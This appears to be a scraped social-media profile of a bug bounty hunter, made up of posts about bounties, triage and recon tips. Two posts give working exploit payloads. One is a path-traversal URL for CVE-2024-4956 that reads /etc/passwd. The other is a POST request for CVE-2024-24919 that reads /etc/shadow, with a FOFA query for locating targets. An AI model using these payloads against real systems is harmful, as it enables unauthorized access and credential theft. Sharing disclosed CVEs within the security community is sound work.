xit! 🇮🇳
@xitsec
Followers
1,586
Following
154
Media
85
Statuses
683
If you are going to try ! Go all the way ✨️ Security Engineer !| Bug bounty hunter !| Pentester | whitehat @Immunefi | bugcrowd | hackerone | hackenproof .
Joined October 2023
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
الهلال
• 627177 Tweets
River
• 268870 Tweets
Dubois
• 111276 Tweets
Michigan
• 95874 Tweets
#रामचरितमानसअनुसारमोक्षकैसेहो
• 95166 Tweets
Romero
• 85135 Tweets
Riquelme
• 80448 Tweets
Watch Factful Debates YouTube
• 77446 Tweets
Oklahoma
• 50359 Tweets
#仮面ライダーガヴ
• 39563 Tweets
Janet Jackson
• 35880 Tweets
Tennessee
• 34465 Tweets
Iowa
• 31984 Tweets
秋分の日
• 31859 Tweets
秒速5センチメートル
• 30206 Tweets
Auburn
• 23014 Tweets
#ブンブンジャー
• 19927 Tweets
ショウマ
• 15320 Tweets
ADLK NEVER ENDING
• 14960 Tweets
ダブルドライバー
• 13599 Tweets
Bristol
• 13244 Tweets
設営完了
• 11803 Tweets
#MostRequestedLive
• 11730 Tweets
サンシーター
• 10835 Tweets
#อ๋อมอรรคพันธ์
• 10749 Tweets
Choose A program for me from the list !
I will hunt on it ! And will post bounty within a week!
#BugBounty
#hackerone
@Hacker0x01
81
10
270
Easy P2,p3 bug methodology to find sqli, xss and injection attacks
1. waybackurls | grep = | tee param.txt
git clone =
2. cat param.txt | nuclei -t fuzzing-templates
#bugbounty
#bugbountytips
#bugcrwod
4
55
238
30
14
236
18
6
214
Cve = CVE-2024-4956 assigned to Unauthenticated Path Traversal at Nexus Repository Manager 3
Vulnerable path = /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
POC at =
3
34
198
4
0
153
Hii
@MtnBer
You are insane 🔥🫶! What did you actually looks for client side Bugs ?
@MtnBer
#bugbounty
3
5
147
5
1
127
1
6
120
5
3
117
I earned $175 for my submission on
@bugcrowd
#ItTakesACrowd
Such a nice program .
Drop a heart❤️ for this program manager ! he deserves it .
7
1
118
9
0
101
I installed kali linux as a dual boot for bug bounty purpose ! Is it worth it?
#bugbounty
Accidently installed it on C drive🥲!
41
1
95
6
0
98
Tip : If you are not able to find bug with recon ! Just hunt on main App!
Recon is not necessary!
#BugBounty
#bugbountytips
#bugbounty
#bugcrowd
@Bugcrowd
12
0
96
I dont know why i like Hunting on public programs ! Even having a lot of private programs !
#bugbounty
11
1
92
6
4
84
CVE-2024-24919 :- allow attacker to read info on check point and remote acess Just make a post request to your target
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
---------
FOFA Query: app="Check_Point-SSL-Network-Extender"
3
20
83
11
0
81
I earned $300 for my submission on
@bugcrowd
#ItTakesACrowd
#bugbounty
Got bounty from atlassian thankyou all who supported! 🙏🫂❤️
5
0
79
4
0
77
I Reported 6 valid Bugs to Auth0 ! Almost all the triage but 4 of them are externally tracked duplicate sumission! And 2 are internally Duplicate!
What's your thoughts on this? Externally duplicate thing !
#BugBounty
#bugbounty
6
0
76
Always try to exploit api keys!
@ADITYASHENDE17
@Bugcrowd
@fransrosen
@GodfatherOrwa
#bugbountytip
#bugbounty
@NahamSec
11
3
71
Yeay, I was $$$ awarded for a valid submission on
@HackenProof
#hackenproofed
#bugbounty
#hackenproof
2
4
64
Tip:Have you ever tried taking over a chatbot😂?
@NahamSec
@ADITYASHENDE17
@Bugcrowd
@GodfatherOrwa
#
#bugbountytip
#bugbounty
11
3
61
1
0
61
1
0
60
Hi
@TomNomNom
i always wanted to know that which vps service you are using during the recon stream with nahamsec ! And also which terminal ! are you using Wsl with some type of theme ? i will be glad if you answer this .
2
4
58
Tip:- After testing an website always check the requests from target history in burpsuite !
#BugBounty
#bugbountytips
#bugcrowd
@GodfatherOrwa
@NahamSec
4
0
54
Yeay, I was awarded for a valid submission on
@HackenProof
#hackenproofed
#bugbounty
@NahamSec
@GodfatherOrwa
@TomNomNom
3
1
51
Netflix Bug bounty ! Netflix changed their bug bounty platform from Bugcrwod to Hackerone! | So Hunters What do you think about their decision ?
#bugbounty
#bugcrowd
#hackerone
@Hacker0x01
1
0
44
I think Social media apps takes your lot of valuable time ! I will try to distance myself from them ! And Try to no more post about bounties ! Its better to keep things private!
8
0
45
13
1
42
Microsoft should change their bug bounty program to vdp program! Who doesn't pay for thousand of PII leakage
#msrc
#bugbounty
4
0
43
Another Triage on bugcrowd
@Bugcrowd
thnx guxim_bugcrowd for validating the issue
#bugbounty
#bugcrowd
2
0
42
Ever got a P4 informational ! 😂
@ADITYASHENDE17
@Bugcrowd
@baabayaga07
@GodfatherOrwa
#bugbounty
+ Dupe🙃
3
0
38
Thnx for validating report ! This triager is very much professional and calm! I really liked his behavior towards my report
@Hacker0x01
#bugbounty
#hackerone
2
0
38
Hii Is there any possible way of deserialization attack or rce ! Is this response vulnerable to deserialization attack!
@ArmanSameer95
@GodfatherOrwa
@galnagli
@NahamSec
5
0
38
Some guy hunting on testphp ! And selling advance bug bounty course ! Lol🤣 Even they dont have profile on bug bounty platforms!
#bugbounty
6
3
36
Alibaba bug bounty is going to be shutdown immediately! On hackerone
I have 2 triage bugs there 🥹!
#bugbounty
#hackerone
8
0
34
In June, I submitted 15 vulnerabilities to 2 programs on
@Hacker0x01
.
#TogetherWeHitHarder
#bugbounty
4
0
35
In August, I submitted 19 vulnerabilities to 6 programs on
@Hacker0x01
.
#TogetherWeHitHarder
#bugbounty
3
0
34
0
0
31
From the one week challenge ! I have got votes to hunt on metamask , trip , ring and compass program ! I hunted on all of them !Two bugs got duplicate ! One bug in triage state and other are pending !I will post bounty for triage bugs !Lets wait for company response!
#bugbounty
5
0
31
2
0
29
In July, I submitted 17 vulnerabilities to 2 programs on
@Hacker0x01
.
#TogetherWeHitHarder
#bugbounty
1
0
29
3
0
29
We scored 229th place ! At Nahamcon Ctf 2024 with
@Cyber78678
@LazyBugHunter
My team name = XIT the ctf arrangements was excellent for me
@NahamSec
#bugbounty
#ctf
#nahamcon
Writeup soon for The mission challange
@_JohnHammond
4
0
26
* Happy Side bug bug bounty = Bounty
* What about Sad Side? = Duplicates , N/A , Informational , Internally found 🥲
Drop What i am missing!
#BugBounty
#bugbounty
6
0
25
In May, I submitted 20 vulnerabilities to 5 programs on
@Hacker0x01
.
#TogetherWeHitHarder
#bugbounty
#hackerone
0
0
25
0
0
25
Hello winners! 👋🏻
@xitsec
@ansh_Choukseey
@jainpriya_
Please DM me with your favourite
@kong_sec
merch along with size and relevant details!
#cybersecurity
#GiveawayAlerts
5
1
8
3
0
22
Very excited for kongsec merch!😇🤩! Thnx for the giveaway
@ADITYASHENDE17
@ich_rish99
#bugbounty
@kong_sec
2
1
21
1
1
21
After getting a lot almost 40 duplicates in hackerone ! I am finally seing some results❤️
@ADITYASHENDE17
@fransrosen
@Hacker0x01
@NahamSec
#BugBounty
#hackerone
6
0
21
Idor at API body
@Bugcrowd
@GodfatherOrwa
@fransrosen
@ADITYASHENDE17
#bugbountytip
#bugbounty
@NahamSec
0
1
18
1
0
18
@uditdwivedi079
@dishant_singh14
@itz_mg_
@errorsec_
@krishnsec
@ManasH4rsh
@tabaahi_
@MrDamanSingh
* I actually love to Read books on Api testing , i recommend You to read this book =
* This book is so much useful
1
3
15
Hi I have a question for triagers . Is adding background music or song to the Poc video IS ok ? Or it is creating disturbance during Focus on Poc?
#bugbounty
9
0
13
Second triage in microsoft ! Dont know if i got bounty or not!
@ADITYASHENDE17
@Bugcrowd
@GodfatherOrwa
@NahamSec
#BugBounty
#bugbountytips
1
0
14
I was waiting for this! The mission challenge was actually hard! I was only able to get 2 flag out of all the parts ! Thnx for video
@NahamSec
very much needed !
@_JohnHammond
This video is a walkthrough of the
#NahamCon2024
Mission which includes some cool JWT and recon tricks, API hacking, SSRF, and SQLi! 👀
1
22
183
0
0
14
0
4
12
Triagers who works in weekend and sunday ! Has special place in bug hunters heart ❤️🫡
#bugbounty
0
1
12
Before anything! Make sure to be happy ! Keep track of your mental health ! ✨️
0
0
9
@7h3h4ckv157
they are converted into P1 !😂
Btw Thank you bro you are really a nice person ! in community
1
0
8
Not applicable 🥲1. Got an endpoint from wayback 2. It is the registration form 3. Email parameter is present in the url
#bugbounty
4. Now when the user fill amd submit the registartion | the registartion will be sended to the email prsent in url
5. Attacker can change the email
2
1
7
@fattselimi
Yes man definitely ! No easy money here ! it takes a lot of Struggle and hard work !
0
0
7
Nice one!
1
0
7
